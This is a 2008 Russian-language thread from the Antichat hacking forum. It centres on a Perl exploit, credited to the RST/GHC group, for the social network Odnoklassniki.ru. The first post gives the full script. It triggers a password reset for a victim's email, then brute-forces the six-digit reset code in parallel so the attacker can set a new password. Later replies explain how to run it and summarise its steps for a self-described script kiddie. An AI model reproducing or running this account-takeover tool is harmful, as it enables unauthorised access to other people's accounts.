ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

эксплоит для одноклассники.ру от Rst/ghc
  #1  
Старый 26.05.2008, 16:21
Аватар для NFM
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
Провел на форуме:
5120686

Репутация: 531


По умолчанию эксплоит для одноклассники.ру от Rst/ghc

Все слышали новость что 26 в паблик уидет сплоит от известной команды. Сплоит раздали на ирк канале рст где-то в 4 часа. Вот сам сплоит

PHP код:
#!/usr/bin/perl
use LWP::UserAgent;
 
print 
qq(
   ,
__                    __,                       
   \\ \\                    / /                     
    \\ \\     
__      _    / /                      
       \\  .
___/\\:::* /\\ /                         
          |
_____\\  |/  \\                         
         /<>
//,./      /       _________                             
        
/      /      /  \\    |  RST                 
       
/      /.,\\\\<>/\\   \\   |   GHC                       
       
\\      \\    /'  \\  /   |    UKT
        \\      \\  /     \\     |__\\xD____                         
         \\      \\/      /                           
       /  '''
\\'''      /                               
    / /       \\   \\   / \\ \\                         
   / /         ___ \\ /   \\ \\                       
   *__                    __*
               [preved odnoklassne4gi]
                 
);
 
 
 
if (!scalar(@ARGV)) {
    print "\[~\]Usage : ./$0 eMail {number of child procs}\n\n";
    exit();
}
if (-e "success") {
    print "\[-\] File \"success\" exists in your directory. Please rename it or remove.\n\n";
    exit();    
}
 
my $email="$ARGV[0]";
 
if ($ARGV[1]) {
    my $MAX_PROCESSES=$ARGV[1];
} else {
    my $MAX_PROCESSES=5;
}
my $DEBUG=0;
 
my @pids;
my $npids=0;
my $restore=0;
my $e;
 
# first step - omg! I lost my password?!?!?!
$ua=LWP::UserAgent->new();
$page=$ua->post("http://odnoklassniki.ru/cdk/st.cmd/password/tkn/6544",["st.email"=>$email,"st.posted"=>"set"]);
$page_content=$page->content();
if ($page_content=~/st.email/) {
    print "\[-\] Please provide correct email address\n";
    exit();
} else {
    print "\[+\] Repair password code send to $email\n";
}
 
# step number two - bruteforce code for repair password
print "\[~\] Brutforce code for repair password\
This process make take max ~ 18 hours to check all combinations\
You need good internet channel and fast cpu\n";
open(LOG_FILE,">>log");
$not=1;
for ($code=100000;$code<=999999;$code++) {
    if (-e "success") {
        print "DONE";
        exit();
    }
    if ($code==199999 && $not==1) {
        $cod="099999";
        $not=0;
        $code=100000;
    } elsif ($code=~/^1(\d+)$/ && $not==1) {
        $code=~/^1(\d+)$/;
        $cod="0$1";
    } else {
        $cod=$code;
    }
    if ($cod=~/^(\d+)000$/) {
        print "#";
    }
 
    my $pid;
    $pid=fork();
    if($pid>0){
     push(@pids,$pid);
     $npids++;
     if($npids>=$MAX_PROCESSES){
         for(1..($MAX_PROCESSES)){
          $wait_ret=wait();
          if($wait_ret>0){
                    $npids--;
                }
            }
        }
        next;
    }elsif(undef $pid){
        print "fork error\n" if ($DEBUG);
        exit(0);
    }
    $p=$ua->post("http://www.odnoklassniki.ru/dk",["st.cmd"=>"passwordReset","st.email"=>$email,"st.confirmation-code"=>$cod,"st.posted"=>"set"]);
    $con=$p->content();
    if ($con=~/password.confirmation/) {
        print "$cod cached\n";
        print LOG_FILE "$cod cached\n";
        open(SUCCESS,">>success");
        print SUCCESS "\n############################\n";
        print SUCCESS "Yahooo! Congratulations! Code for password repair is - $cod\n";
        print SUCCESS "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
        print SUCCESS "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
        print SUCCESS "############################\n";
        print "############################\n";
        print "Yahooo! Congratulations! Code for password repair is - $cod\n";
        print "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
        print "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
        print "############################\n";
        close(SUCCESS);
    } else {
        print LOG_FILE "$cod failed\n";
    }
    exit();
}
close(LOG_FILE); 
 
Ответить с цитированием

  #2  
Старый 26.05.2008, 16:25
Аватар для k0lbasa
k0lbasa
Постоянный
Регистрация: 25.05.2008
Сообщений: 367
Провел на форуме:
2352294

Репутация: 416
По умолчанию

как насчет инструкции)
 
Ответить с цитированием

  #3  
Старый 26.05.2008, 16:33
Аватар для Zedobat
Zedobat
Участник форума
Регистрация: 24.07.2007
Сообщений: 175
Провел на форуме:
1092179

Репутация: 102
По умолчанию

Цитата:
Сообщение от k0lbasa  
как насчет инструкции)
Цитата:
Usage : ./$0 eMail {number of child procs}
пишешь путь к файлу а потом нужно мыло.

Как я понял сплойт запрашивает восстановление пароля (первый шаг), и после брутит код для восстановления пароля (шаг второй). Для перебора всех комбинаций требуется около 18 часов.

Ну а после проходим по ссылке пишем мыло ,код и новый пароль.
 
Ответить с цитированием

  #4  
Старый 26.05.2008, 16:35
Аватар для Karantin
Karantin
Постоянный
Регистрация: 21.12.2007
Сообщений: 475
Провел на форуме:
1270580

Репутация: 387
Отправить сообщение для Karantin с помощью ICQ
По умолчанию

Я уже выложил в теме про эксплойт
https://forum.antichat.ru/threadnav71241-1-10.html
 
Ответить с цитированием

  #5  
Старый 26.05.2008, 16:37
Аватар для MaDfUn
MaDfUn
Познающий
Регистрация: 02.02.2007
Сообщений: 78
Провел на форуме:
1514596

Репутация: 49
По умолчанию

Мдя...жалко что жить он будет недолго....
 
Ответить с цитированием

  #6  
Старый 26.05.2008, 16:46
Аватар для k0lbasa
k0lbasa
Постоянный
Регистрация: 25.05.2008
Сообщений: 367
Провел на форуме:
2352294

Репутация: 416
По умолчанию

по википедии я - скрипткидди))
так что хотелось бы узнать поподробнее
 
Ответить с цитированием

  #7  
Старый 26.05.2008, 16:51
Аватар для NFM
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
Провел на форуме:
5120686

Репутация: 531


По умолчанию

колбаса, ставь актив перл и запускай
 
Ответить с цитированием

  #8  
Старый 26.05.2008, 20:07
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

интнрнсная приколюха хотя пока мне и ненужная
 
Ответить с цитированием

  #9  
Старый 26.05.2008, 20:12
Аватар для Чиловег Ниоткудо
Чиловег Ниоткудо
Banned
Регистрация: 24.05.2008
Сообщений: 42
Провел на форуме:
63344

Репутация: 26
Отправить сообщение для Чиловег Ниоткудо с помощью ICQ Отправить сообщение для Чиловег Ниоткудо с помощью AIM Отправить сообщение для Чиловег Ниоткудо с помощью MSN Отправить сообщение для Чиловег Ниоткудо с помощью Yahoo
По умолчанию

Цитата:
Сообщение от heks  
интнрнсная приколюха хотя пока мне и ненужная
потом (а это пару дней) она работать не будет...
 
Ответить с цитированием

  #10  
Старый 26.05.2008, 20:34
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Как-то большего ожидал..)
__________________
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор программ для очистки жёсткого диска v1ru$ Soft - Windows 21 17.01.2010 21:07
комплекс SEO-master SQL SЕО - тонкости, методы раскрутки 2 19.03.2008 20:22
G$tarLpMan Lite - редактор ленга для китов. EmitRemus Сотовый фрикинг 0 17.01.2008 00:03
Изготавливаем эффектный водоблок своими руками dinar_007 Аппаратное обеспечение 0 09.01.2006 19:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ